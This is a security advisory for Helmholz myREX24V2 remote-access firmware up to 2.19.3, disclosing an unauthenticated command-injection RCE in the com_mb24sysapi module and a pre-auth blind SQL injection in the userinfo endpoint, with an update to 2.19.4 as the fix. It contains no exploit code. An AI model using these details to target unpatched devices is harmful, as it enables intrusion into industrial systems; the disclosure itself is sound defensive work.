Summary
Multiple vulnerabilities have been discovered in Helmholz myREX24V2 / myREX24V2.virtual that could allow unauthenticated RCE or SQLi.
Impact
CVE-2026-32968 allows unauthenticated RCE resulting in full system compromise impacting confidentiality, integrity, and availability, while CVE-2026-32969 allows unauthenticated SQLi resulting in arbitrary read access to the complete database.
Affected Product(s)
| Model no. | Product name | Affected versions |
|---|---|---|
| Helmholz myREX24V2 | Firmware 2.19.3, Firmware <=2.19.3 | |
| myREX24V2.virtual | Firmware <=2.19.3, Firmware 2.19.3 |
Vulnerabilities
Expand / Collapse allDue to the improper neutralisation of special elements used in an OS command, an unauthenticated remote attacker can exploit an RCE vulnerability in the com_mb24sysapi module, resulting in full system compromise. This vulnerability is a variant attack for CVE-2020-10383.
An unauthenticated remote attacker can exploit a Pre-Auth blind SQL Injection vulnerability in the userinfo endpoint’s authentication method due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality.
Remediation
Update the myREX24V2/myREX24V2.virtual instance to version 2.19.4.
Acknowledgments
Helmholz GmbH & Co. KG thanks the following parties for their efforts:
- CERT@VDE for coordination (see https://certvde.com )
- Moritz Abrell, Christian Zäske from SySS GmbH for reporting (see https://www.syss.de )
Revision History
| Version | Date | Summary |
|---|---|---|
| 1.0.0 | 23.03.2026 13:00 | Initial revision. |